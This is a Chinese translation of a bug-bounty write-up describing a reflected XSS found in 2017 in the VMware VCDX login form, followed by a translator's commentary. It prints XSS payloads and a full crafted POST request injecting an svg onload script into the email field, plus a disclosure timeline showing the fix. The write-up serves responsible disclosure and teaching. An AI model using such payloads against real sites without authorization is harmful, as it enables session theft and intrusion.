#翻译文章# 原文:
https://medium.com/@honcbb/vmware-official-vcdx-reflected-xss-90e69a3c35e1
我正在浏览HackerOne错误赏金计划。我想尝试首先找到大企业的漏洞!我选择VMware。在开始之前,请查看VMware漏洞策略是否需要注意,这是参与任何漏洞奖励计划时应注意的事项。阅读完VMware漏洞政策后,没有什么太多需要注意的(只需要知道那些漏洞范围就好了)。
如果VMware产品中使用的第三方软件组件中存在漏洞,请也通知VMware。
策略:
https://www.vmware.com/support/policies/security_response
不必多说,我们开始寻找漏洞。
根据我使用VMware产品的经验,我认为每个产品都有一个认证专家证章,以此类推,来找到我们的目标网站。
站点:https : //vcdx.vmware.com/是有VMware专家认证的!!
但是似乎没有地方可以注册。我们只好进入登录页面。
起初,很多人会尝试使用SQL注入某些语句,但是我认为机会不大,因为大公司一般不会存在如此明显的漏洞。
根据职业病,我尝试输入XSS字符串“> <img src = x Onerror:alert(1)/>”
我使用抓取数据进行修改
POST /login HTTP/1.1
Host: vcdx.vmware.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://vcdx.vmware.com/login
Cookie: connect.sid=s%3AwU84EnNnabqCyW98coEEFYTZLhYkitff.al1Ce9v8xNZNBnZIhvDJ8IDQzDHVDBXlgb8%2BxV%2By2gg
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
redirectTo=&email=%22%3E%3Csvg%2Fonload%3Dalert%28domain%29%3E%22&password=
结果
确实是请求响应XSS,我敢肯定这是一个漏洞
时间线
·2017/02/13 08:4 6向VMware Security Team提供漏洞详细信息
·2017/02/14 11:35 收到Vinay的回应说检查正在进行中
·2017/03/25 02:09 已修复
·2017/03/31 05:18 告诉我会有VMware Swag纪念品
译者按:
作者通过"Vmware certification expert"找到了目标网站,网站并没有注册功能,但是作者上来就XSS一把梭。这个漏洞就目前情况来看是个很明显的self-xss,当然也有可能插入到后台里日志(但目前没有证据支持)。但是这个漏洞的重点不在于self-xss,而是大家普遍认为vmware这种公司技术能力比较强,对其资产望而却步。但是通过最近的漏洞信息,大家发现vmware好像也不是那么安全,只是没有深入的测试罢了。所以译者就希望以后平台上有新项目的话,大家还是要多多参与进来,万一一个改一改的payload打过去就RCE了呢?
本文迁移自知识星球“火线Zone”
